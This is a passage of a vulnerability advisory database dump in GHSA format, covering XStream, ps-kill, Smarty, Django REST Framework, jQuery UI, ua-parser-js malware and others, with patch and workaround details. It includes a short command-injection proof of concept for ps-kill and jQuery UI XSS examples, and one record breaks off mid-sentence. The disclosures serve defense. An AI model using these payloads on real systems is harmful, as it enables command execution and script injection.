to use at least version 1.4.16 + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21342](https://x-stream.github.io/CVE-2021-21342.html). + +### Credits +钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hvv8-336g-rx3m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21342'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21342.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:33Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-qpfq-ph7r-qv6f,2022-02-08T21:32:28Z,2021-03-22T23:29:00Z,,['CVE-2021-21347'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21347](https://x-stream.github.io/CVE-2021-21347.html). + +### Credits +The vulnerability was discovered and reported by threedr3am. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-qpfq-ph7r-qv6f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21347'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21347.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:25:22Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-7qmm-q394-fmch,2023-09-05T23:01:21Z,2021-03-19T21:19:29Z,,['CVE-2021-23355'],Command Injection in ps-kill,"This affects all versions of package ps-kill. If (attacker-controlled) user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file. + +PoC (provided by reporter): +```js +var ps_kill = require('ps-kill'); +ps_kill.kill('$(touch success)', function() {}); +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ps-kill'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23355'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PSKILL-1078529'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T22:05:22Z', 'nvd_published_at': '2021-03-15T17:15:00Z'}" +1.4.0,GHSA-9824-rp6m-xx9w,2021-03-18T22:17:02Z,2021-03-29T20:59:04Z,,['CVE-2019-0989'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0989'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/e0ce3f01c83c53f93e7299d7c8b389b17084aa1f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0989'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:17:02Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}" +1.4.0,GHSA-w5hr-jm4j-9jvq,2022-05-03T03:42:06Z,2021-03-02T02:57:23Z,,['CVE-2021-26119'],Sandbox escape through template_object in smarty,Sandbox protection could be bypassed through access to an internal Smarty object that should have been blocked. Sites that rely on [Smarty Security features](https://www.smarty.net/docs/en/advanced.features.tpl) should upgrade as soon as possible. Please upgrade to 3.1.39 or higher.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'smarty/smarty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.39'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/security/advisories/GHSA-w5hr-jm4j-9jvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26119'}, {'type': 'PACKAGE', 'url': 'https://github.com/smarty-php/smarty/'}, {'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00014.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202105-06'}, {'type': 'WEB', 'url': 'https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5151'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T02:55:01Z', 'nvd_published_at': '2021-02-22T02:15:00Z'}" +1.4.0,GHSA-fx83-3ph3-9j2q,2023-08-31T16:40:38Z,2021-03-19T21:32:47Z,,['CVE-2020-25626'],Cross-site Scripting (XSS) in Django REST Framework,"A flaw was found in Django REST Framework versions before 3.12.0 and before 3.11.2. When using the browseable API viewer, Django REST Framework fails to properly escape certain strings that can come from user input. This allows a user who can control those strings to inject malicious "", + currentText: """", + prevText: """", + nextText: """", + buttonText: """", + appendText: """", +} ); +``` +will call `doEvilThing` with 6 different parameters coming from all `*Text` options. + +### Patches +The issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML. + +### Workarounds +A workaround is to not accept the value of the `*Text` options from untrusted sources. + +### For more information +If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41183'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/pull/1953'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'WEB', 'url': 'https://bugs.jqueryui.com/ticket/15284'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-contrib-2022-004'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-001'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-002'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:45Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}" +1.4.0,GHSA-pjwm-rvh2-c87w,2023-07-28T15:38:48Z,2021-10-22T20:38:14Z,,[],Embedded malware in ua-parser-js,"The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold. + +Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.29'}, {'fixed': '0.7.30'}]}], 'versions': ['0.7.29']}, {'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.1'}]}], 'versions': ['0.8.0']}, {'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.1'}]}], 'versions': ['1.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/issues/536'}, {'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949772496'}, {'type': 'PACKAGE', 'url': 'https://github.com/faisalman/ua-parser-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ua-parser-js'}]","{'cwe_ids': ['CWE-829', 'CWE-912'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T20:37:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-w729-7633-2fw5,2021-10-29T13:51:56Z,2021-10-27T18:52:06Z,,['CVE-2021-40865'],Deserialization of Untrusted Data leading to Remote Code Execution in Apache Storm,An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40865'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d45e74299897b6734dd0f788c46a631009ce2eeb731523386f7a253%40%3Cuser.storm.apache.org%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2021/q4/45'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:53:48Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}" +1.4.0,GHSA-634c-v2xv-ffpg,2021-10-07T20:28:55Z,2021-10-12T22:02:51Z,,['CVE-2017-14136'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds write error in the function FillColorRow1 in utils.cpp when reading an image file by using cv::imread. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-12597.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-14136'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9443'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9448'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:28:55Z', 'nvd_published_at': None}" +1.4.0,GHSA-9g3v-j3cr-6fc6,2021-10-25T20:08:05Z,2021-10-21T17:48:26Z,,['CVE-2021-3879'],Cross-site Scripting in snipe-it,snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3879'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/bda23bb1e66fd7ce42c75c69cf5eea4e80865c1c'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6dccc49e-3843-4a4a-b397-5c659e5f8bfe'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:51:59Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}" +1.4.0,GHSA-9g8h-pjm4-q92p,2021-11-18T15:31:47Z,2021-10-12T22:23:41Z,,['CVE-2018-5268'],Out-of-bounds Write in OpenCV.,"In OpenCV 3.3.1 (corresponding with OpenCV-Python 3.3.1.11), a heap-based buffer overflow happens in cv::Jpeg2KDecoder::readComponent8u in modules/imgcodecs/src/grfmt_jpeg2000.cpp when parsing a crafted image file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-5268'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10541'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10566/commits/435a3e337bd9d4e11af61cf8b8afca067bf1a8aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/04/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:55:52Z', 'nvd_published_at': '2018-01-08T05:29:00Z'}" +1.4.0,GHSA-rjf2-j2r6-q8gr,2021-10-19T14:18:05Z,2021-10-19T15:28:45Z,,['CVE-2021-23449'],Prototype Pollution in vm2,This affects the package vm2 before 3.9.4. Prototype Pollution attack vector can lead to sandbox escape and execution of arbitrary code on the host machine.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23449'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/363'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/releases/tag/3.9.4'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211029-0010/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VM2-1585918'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T14:18:05Z', 'nvd_published_at': '2021-10-18T17:15:00Z'}" +1.4.0,GHSA-cpqf-3c3r-c9g2,2021-10-05T15:57:32Z,2021-10-05T17:53:20Z,,['CVE-2021-40323'],Cobbler before 3.3.0 allows log poisoning,"Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40323'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:57:32Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}" +1.4.0,GHSA-9gj3-hwp5-pmwc,2021-10-27T17:00:10Z,2021-10-26T14:55:02Z,,['CVE-2021-41182'],XSS in the `altField` option of the Datepicker widget in jquery-ui,"### Impact +Accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. For example, initializing the datepicker in the following way: +```js +$( ""#datepicker"" ).datepicker( { + altField: """", +} ); +``` +will call the `doEvilThing` function. + +### Patches +The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector. + +### Workarounds +A workaround is to not accept the value of the `altField` option from untrusted sources. + +### For more information +If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41182'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/pull/1954/commits/6809ce843e5ac4128108ea4c15cbc100653c2b63'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 